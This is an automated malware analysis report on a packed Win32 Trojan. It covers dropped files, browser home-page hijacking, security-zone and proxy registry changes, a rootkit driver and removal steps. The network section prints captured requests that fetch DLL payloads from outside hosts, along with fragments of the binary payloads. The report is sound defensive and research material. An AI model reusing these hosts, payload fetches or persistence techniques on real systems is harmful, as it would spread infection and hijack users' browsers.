HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.189562 (B) (Emsisoft), Gen:Variant.Zusy.189562 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8fa230d89566728811fbdc8f4c477720
SHA1: d9c9b95bca3d254288877b01e0da97bbaeea5b43
SHA256: a9e79e778eda033f948cac4f4007b1e8b945f06dc5d79a0d082fef4cf73c09f8
SSDeep: 24576:HS 58sokJuxd62VRhz6FAChTom8X7ACvwEbghF3/:HSwux42VCFBTomkACvw9v
Size: 974848 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2011-10-18 23:23:48
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1676
The Trojan injects its code into the following process(es):
AIKCJr.exe:1224
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process AIKCJr.exe:1224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\style[1].css (1615 bytes)
%WinDir%\dxuqPtw.dll (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%WinDir%\tSaYSReT\nTmGlHW.dll (144 bytes)
%WinDir%\CLOG.txt (5439 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\175sf[1].htm (3444 bytes)
%WinDir%\tSaYSReT\XKhGMY.dll (12973 bytes)
%System%\cd893\CDClient_EX.sys (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\jscript_jquery-1.4.2.min[1].js (5083 bytes)
%WinDir%\tSaYSReT\tYVsYdGd.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%WinDir%\tSaYSReT\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
The Trojan deletes the following file(s):
%WinDir%\dxuqPtw.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (0 bytes)
%WinDir%\tSaYSReT\nTmGlHW.dll (0 bytes)
%System%\cd893\CDClient_EX.sys (0 bytes)
%WinDir%\tSaYSReT\tYVsYdGd.tmp (0 bytes)
%WinDir%\tSaYSReT\498E9.dat (0 bytes)
The process %original file name%.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\CywGCv\AIKCJr.exe (7593 bytes)
%WinDir%\CLOG.txt (43 bytes)
%WinDir%\vSRfNk.dll (11 bytes)
The Trojan deletes the following file(s):
%WinDir%\vSRfNk.dll (0 bytes)
Registry activity
The process AIKCJr.exe:1224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\sW8IErEU6Pd]
"ErrorControl" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\sW8IErEU6Pd]
"ImagePath" = "\DosDevices\%System%\cd893\CDClient_EX.sys"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\System\CurrentControlSet\Services\sW8IErEU6Pd]
"Type" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B E9 E2 86 65 AE 04 39 16 F1 5C 8C 14 CF F4 BA"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90131381_hao_pg"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\System\CurrentControlSet\Services\sW8IErEU6Pd]
"Devname" = "sW8IErEU6Pd"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Automatic startup of the following service is disabled:
[HKLM\System\CurrentControlSet\Services\sW8IErEU6Pd]
"Start" = "3"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 FA FC 91 63 3E 8D 9B 8C 19 31 0A 05 C1 9B 78"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
851c4bdb8521ae1c1392bf277c177e6f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\CywGCv\AIKCJr.exe |
68a6734e9ed12163481ede18bfdd9b7b | c:\WINDOWS\tSaYSReT\XKhGMY.dll |
158b710a2ce07e3a34e46118f2ad39f2 | c:\WINDOWS\tSaYSReT\nTmGlHW.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "\DosDevices\%System%\cd893\iEwx6T7VPp9.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\%System%\cd893\iEwx6T7VPp9.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\%System%\cd893\iEwx6T7VPp9.sys" the Trojan controls operations with a system registry by installing the registry notifier.
The Trojan installs the following kernel-mode hooks:
ZwTerminateProcess
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1676
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\style[1].css (1615 bytes)
%WinDir%\dxuqPtw.dll (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Favorites\Links\Windows Marketplace.url (262 bytes)
%WinDir%\tSaYSReT\nTmGlHW.dll (144 bytes)
%WinDir%\CLOG.txt (5439 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\175sf[1].htm (3444 bytes)
%WinDir%\tSaYSReT\XKhGMY.dll (12973 bytes)
%System%\cd893\CDClient_EX.sys (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\jscript_jquery-1.4.2.min[1].js (5083 bytes)
%WinDir%\tSaYSReT\tYVsYdGd.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%WinDir%\tSaYSReT\498E9.dat (14 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (865 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\CywGCv\AIKCJr.exe (7593 bytes)
%WinDir%\vSRfNk.dll (11 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 1212416 | 964096 | 5.545 | 187fd9571eb9bb230014409ae9670775 |
.rsrc | 1216512 | 12288 | 9728 | 4.4235 | 4b0b635d634099e025f78b82d6d7af84 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.58sky.com/index/getcfg?id=1 | 119.97.143.27 |
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll | |
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll | |
hxxp://5636.ecoma.ourwebpic.com/ips1388.asp | |
hxxp://so.qh-lb.com/ | |
hxxp://175.haodns123.cc/ | |
hxxp://so.seos-lb.com/ | |
hxxp://175.haodns123.cc/js/jscript_jquery-1.4.2.min.js | |
hxxp://175.haodns123.cc/css/style.css | |
hxxp://ip.catr.cn/ | 59.108.230.35 |
hxxp://www.haosou.com/ | 125.88.193.243 |
hxxp://www.ip138.com/ips1388.asp | 87.245.198.83 |
hxxp://www.175sf.com/js/jscript_jquery-1.4.2.min.js | 14.29.32.98 |
hxxp://www.go890.com/d2/CDClient.dll | 87.245.198.83 |
hxxp://www.175sf.com/css/style.css | 14.29.32.98 |
hxxp://www.go890.com/d2/x86.dll | 87.245.198.83 |
hxxp://www.175sf.com/ | 14.29.32.98 |
www.so.com | 106.120.160.134 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Sat, 08 Oct 2016 03:59:38 GMT
Server: kangle/2.9.6
Last-Modified: Sat, 08 Oct 2016 03:15:18 GMT
Content-Type: application/octet-stream
Content-Length: 838656
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................p....................@.............................................................................P...................................................................................................................CODE....................PEC2^O...... ....rsrc....0.......&.................. ....reloc..............................@....................................................................................................................................................................................................................................................................................................................................................................................................................[..b.. .........c....X.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K...}..I...Gi..A>.L..j3..{..=.....Q.fG.{...?.A.G.q...Q............9..\..R.......O.....X}k..4.W._C."P..y...WZ1..........-...M _2..y....."... 71..d......y.l.B.[".x..x..u.....3[.....L...*.g.......!..-...i.-..$.b3._@D
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.haosou.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Sat, 08 Oct 2016 09:18:46 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /index/getcfg?id=1 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Sat, 08 Oct 2016 09:18:37 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.27
Set-Cookie: PHPSESSID=t7v44p8h5hs6qa6gj3cb3s4ea2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1000a..............i....&.W.PD....}L......Y[3.Z3>..P.>..$......>Yg&...w.....B........*......W..*o...d.W..__..(..........>..e....v............v.=.......W...Wq.]..J.$M.Vh.....8..*.l...t....&...........1M>...~.....F......{e...s.N7..9......4E.......Z.../.O.e.o<.....Z.A..-.~z.?..M....v...m..p.\w........O......]..s.....7L..1\G.xc...~...d.B.7...|F.....uv....}.G.Ur........&c...U..@..~......w...(W.........1!..xM.....4..k..z.2?.....n....*..w...o..h........(................... ...u_...c..^...cr. .W>7.}.NV.....F.>...fC}.....G...?.....N..l.UP.v.....=*.....Y.l.U.z.9...2..8q........7.......ek`.< ...~..}.B....?............X<....=...Mp.>.yM..3?.....w>]........<(.0._?.q;.g`..h..m.*I.{.....ic(..}.9..g....0....8~...{#.....`......{..v......m.d..{Q....N.....jz....{6#u.....gp.8......6..s-.j..........W..}....o....oIc....Eu.... .....z}....0.?..4..6....g.%....D..Z...{..A.3/..E.oh-?.m.'w.U....omK.3.]..`.....j.>.l.?.C...k?...n....wI..v..>..Ig[.....I..R..Q..".1............~|o...c.t].uE...'I...j.....;...P...o..Im3}..?..|.v.2../..&.&....}....m...A....N.....v...I%jvm....=I.{.D.......y.-.......:,......n.>.]T\.*.......m.....>.o.......p..]..~......I.S S...bo~.C...w..{p..0dS.C.(.....}..../.H..:.kW.M.....QR............hl.~L.5.v..?..#`g..._*fU....`.7?.v....s...?.wO..\4.........._.ew.i....em..r.%y`O.k.mVk?..m......i....x.a#.&.....~...m......W....\.u....R$j.?B.0..ZB(._..n.3..5-.y..W.....d?}.C.o....T~...LN.ca.....m}.......h....M;9...4.5....O.s.c...........R........$..l...A.X...y.........Jj.../....i.of
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 08 Oct 2016 09:18:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Sat, 08 Oct 2016 00:53:37 GMT
Content-Encoding: gzip
3063.............}.sZW.......h.M..\... ...G......N.{..........<......j......g..$lG.......!../...!;n...9.....[ql..u.GB6G.}.....a..g..^....k.....}...../g~).....g~..?.~_..-..g..".... ./.....$..b..f.....MF.A$.....t.Z..o.Dccc.1..d..}..h...A...nkMI....:.... k..1.-'.<.S.TTq..:......j...[w..?w..}...3Z.?...u.4...]V..U....h..f..zr.O".$]..<....t..........ew9........ ........n..fn.....Ef}/....)d.~....."..4".zDw.....1.Yk..._C.......h..Q...%.Q.iL#..>7..2a.K.......X..>..gw7s.(@t}35..j..y....t"..x........<....vV.k3S..a...Z[7!>].9.Y...._..[..3......2\-m.....f].....b.Y.....x.%..r...|o..Nv..[.u:k...}...g>.X....C...dO..........G(.....!........./O..Q.h.4a.Z.."=...~...;.o3j.s....?..@ ..c]..||.q..c....O.'.S.XQ....>.v.>.Yw...|....h......B...iT0<<..B x..a...>...F....VB|K5.V8...:.5il#...cf...lF...Q..7......k..h5..7..$>...W...#..f..VvQ....I.......]..Y.......S.5."...../,D....S.%2.......X...<.xK...G.j...f6.|.x.Lg.....}t..........5...&..B .q...*...:(....cF..........r1....~..vR.#..y..;'D{|a.j).........$....Fm...4.T...,...b......}..q.:j..~..`.#......[?...YDDe.}jb|.....5..W._.lx(.~.lF......>.c....xm....Zk.*.:..)]).)(.}m.......)...>LH.......N.....X..cC..\...2<.....G9?.....te%....w.V......P.#..D..|>.......pF..0.E..O...hq.....UiU..0....W......7i<[_=._..&.......d..P.:3.YU....l..9.....JMN..s...>@j&~..Ao.....`....>.N0..Z.Ova......6..|..x.....Q.Fo..{?..j....0..i..=.Su...wl.......J.3Z..Hc.i.G.Brq.B...n...]...n...Q_..K..z........U.d...........Y.....b.^..^.....*....7$.b....3....:.......
<<< skipped >>>
GET /js/jscript_jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.175sf.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 08 Oct 2016 09:18:25 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 02:14:30 GMT
Content-Encoding: gzip
607f.................F.(._...XhO...H...g.(.Wk[=..v...(_..Ip..$k..y...>..._,..L.,.{....$r...2"...................o.-....E.\7...".........i.^/.v{r.y[.|..d..2_...h.n<..wD.o.x..)]e#..j....l..Vi..,..h..i......h........*....*..U.h^....n..b0.$..q.}.4K[..YpE.....A_?@G^....&..Ek....)...A.E... ....u.{..<.h....h.x....o.O...|.....\....N.3Bg..f1..........<r.m6tO..l.S.%..v].oW.$.l..b.z.....r...........h=....]....<.7kw..s/(...X.... t..^.....D.m....t..h....M1.)ED.....F.U*`......wV.(......,.....h...uz.....e.XCG.5[,.............2*...y....o..y~...g.......a7E"."..o{...,.Z.t1Z....5t,.6.0..<......0/\..7.E#...\...O.$jf...jHN..."<....OOq...U..XY.v.."..f.K..k...........B}.<?............`......`.9..Ho.....W.5&.w..A S~..........O..M....V....Z.....@.vQ.\..].\..#.,.KH.{0....(F.. 1...}*....p.Bhq..l%..}.......e7...H.X,....d..>.vQ ......4.....`.O......l.}..\..B..vx...X.....)..6.7.i?...d#.f...,.B...&4.mv...f5v...p.`....i..T......~..`0k..t...........5......S...`................t.Nz........6.. ...a...fX"k-.....y.Y....pv../..nR...`.t.@.|...h....q...a..^.......`.z.O.l....zR..v.&...2]..G........ ]'..i.......[!....).2m..z......{.?c.?.%~.O....t#.M.....FM....;.X.R.......8^.......S..U........@d.B...f\...p..e... n..&;n....M^...F..~..X. ...C..:..:.j...f....7...6.0..8d.......N.... ._..>P(x.(x....^{....O.$..D`z/.._j.`io..J.3.4R. .c.&..]...o....T..... ..".8....p :.=.Z..b...@......O.f..:==Y...M....Sw.Zm...X...t0}9...v'.3.Ln...q2.*....F.9{...a2..9....v....5..\.j.od)....=.hA.0Dd..R...p......o.G.(..'i..R?5...Lp...0<......b......
<<< skipped >>>
GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Sat, 08 Oct 2016 03:59:55 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 21 Sep 2016 07:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 132608
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y...y..\yRich..\y........................PE..L...]..W...........!......................................................................@.................................................................|...........................................H...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!...........c.........B..&.......U..j.h..!P..Y.d...P...SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<......<...q........L....o.d....E.......M........Y_^[..]........p.....Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B..r!C.3...0}..@..}.....8.9........&..t..C<.D.x...3<...;.u.|.H.^...e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>
GET /ips1388.asp HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
HTTP/1.1 200 OK
Date: Sat, 08 Oct 2016 09:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9759
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCTCBARB=KHIPNFMAOHPMDGLMDOAPDEDL; path=/
Cache-Control: private
X-Via: 1.1 db78:8 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<HTML>..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta http-equiv="mobile-agent" content="format=html5; url=hXXp://m.ip138.com/ip.html"/>..<TITLE>IP........--.................. | ............ | ............ | ........................</TITLE>..<META NAME="Generator" CONTENT="ip,IP....,IP........,ip138,........">..<META NAME="Author" CONTENT="ip138,........">..<META NAME="Keywords" CONTENT="ip,IP....,IP........,ip138,........">..<META NAME="Description" CONTENT="ip,IP....,IP........,ip138,........">..<SCRIPT LANGUAGE="JavaScript">..<!--..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXp://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(..
<<< skipped >>>
GET /css/style.css HTTP/1.1
Accept: */*
